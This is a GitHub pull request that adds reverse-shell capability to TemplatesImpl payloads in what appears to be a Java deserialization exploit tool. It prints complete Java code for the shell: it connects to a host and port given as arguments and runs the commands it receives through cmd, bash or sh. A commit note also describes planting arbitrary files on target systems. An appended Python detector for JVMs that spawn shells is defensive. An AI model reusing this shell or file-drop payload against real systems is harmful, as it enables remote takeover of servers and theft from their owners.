Added reverse shell capability for TemplatesImpl payloads. #96

Open
wants to merge 3 commits into
base: master

NickstaDB
Contributor

Added a simple reverse command shell which also supports pipes and redirection shell operators. Works with e.g. a netcat listener. For ease of reading/review the shell code is as follows:

java.net.Socket sck = null;
java.io.OutputStream out;
java.io.BufferedReader rdr;
Process proc;
String cmd = "";
String os = System.getProperty("os.name").toLowerCase(java.util.Locale.ENGLISH);

try {
	sck = new java.net.Socket(java.net.InetAddress.getByName(args[0]), Integer.parseInt(args[1]));
	out = sck.getOutputStream();
	rdr = new java.io.BufferedReader(new java.io.InputStreamReader(sck.getInputStream()));
	
	while(cmd.trim().toLowerCase(java.util.Locale.ENGLISH).equals("exit") == false) {
		try {
			out.write("> ".getBytes(), 0, "> ".getBytes().length);
			cmd = rdr.readLine();
			
			if(cmd.trim().toLowerCase(java.util.Locale.ENGLISH).equals("exit") == false) {
				if(os.contains("win")) {
					proc = new ProcessBuilder("cmd", "/c", "\"" + cmd.trim() + "\"").redirectErrorStream(true).start();
				} else {
					try {
						proc = new ProcessBuilder("/bin/bash", "-c", cmd.trim()).redirectErrorStream(true).start();
					} catch(java.io.IOException ioe) {
						if(ioe.getMessage().contains("Cannot run program")) {
							try {
								proc = new ProcessBuilder("/bin/sh", "-c", cmd.trim()).redirectErrorStream(true).start();
							} catch(java.io.IOException ioe2) {
								if(ioe2.getMessage().contains("Cannot run program")) {
									throw new java.io.IOException("Non-Windows target and neither /bin/bash or /bin/sh is present.");
								} else {
									throw ioe2;
								}
							}
						} else {
							throw ioe;
						}
					}
				}
				
				proc.waitFor();
				byte[] b = new byte[proc.getInputStream().available()];
				proc.getInputStream().read(b);
				out.write(b);
			}
		} catch(Exception ex) {
			out.write(("[-] Exception: " + ex.toString()).getBytes());
		}
	}
	
	sck.close();
} catch(Exception ex) {
	if(sck != null) {
		try {
			sck.close();
		} catch(Exception ex2) {}
	}
}
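
An added example, not part of this pull request or the project: a defender-side check for the process pattern the snippet above produces, where the JVM starts a fresh `cmd /c`, `/bin/bash -c` or `/bin/sh -c` child for every command line it receives. The event schema (`parent_pid`, `parent_image`, `argv`), the threshold and the sample events are constructed for illustration.

```python
import ntpath
from collections import defaultdict

# Parent images treated as a JVM (assumption: adjust to your estate).
JAVA_PARENTS = {"java", "java.exe", "javaw.exe"}
# Shell basename -> the flag the snippet passes immediately after it.
SHELL_FLAGS = {"cmd": "/c", "cmd.exe": "/c", "bash": "-c", "sh": "-c"}


def basename(path):
    """Lower-cased basename; ntpath splits on both '/' and '\\'."""
    return ntpath.basename(path).lower()


def is_shell_spawn(event):
    """True if a JVM started `cmd /c <x>`, `bash -c <x>` or `sh -c <x>`."""
    argv = event["argv"]
    if basename(event["parent_image"]) not in JAVA_PARENTS or len(argv) < 3:
        return False
    flag = SHELL_FLAGS.get(basename(argv[0]))
    return flag is not None and argv[1].lower() == flag


def jvms_spawning_shells(events, threshold=2):
    """Map JVM PID -> shell command strings, for JVMs at or over threshold.

    One shell child per received command means an interactive session
    shows up as repeated short-lived shells under the same JVM PID.
    """
    by_parent = defaultdict(list)
    for ev in events:
        if is_shell_spawn(ev):
            by_parent[ev["parent_pid"]].append(ev["argv"][2])
    return {pid: cmds for pid, cmds in by_parent.items() if len(cmds) >= threshold}


# Constructed process-creation events (hypothetical schema and values).
SAMPLE_EVENTS = [
    {"parent_pid": 4120, "parent_image": "/usr/bin/java", "argv": ["/bin/bash", "-c", "id"]},
    {"parent_pid": 4120, "parent_image": "/usr/bin/java", "argv": ["/usr/bin/git", "status"]},
    {"parent_pid": 4120, "parent_image": "/usr/bin/java",
     "argv": ["/bin/bash", "-c", "cat /etc/hostname | tr a-z A-Z"]},
    {"parent_pid": 812, "parent_image": r"C:\Program Files\Java\bin\java.exe",
     "argv": ["cmd", "/c", '"whoami"']},
    {"parent_pid": 900, "parent_image": "/usr/sbin/sshd", "argv": ["/bin/bash", "-c", "ls"]},
]

if __name__ == "__main__":
    for pid, cmds in jvms_spawning_shells(SAMPLE_EVENTS).items():
        print(pid, cmds)
```

Build agents and some application servers start shells from a JVM legitimately, so this signal needs an allowlist of known parents before it is used for alerting.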

root and others added 3 commits October 14, 2018 00:03
Implemented support for writing a given file to a given path on the target system when using a TemplatesImpl gadget chain. The file is base64-encoded and included in the serialized payload alongside code that decodes the file and writes it to the given path on the target system.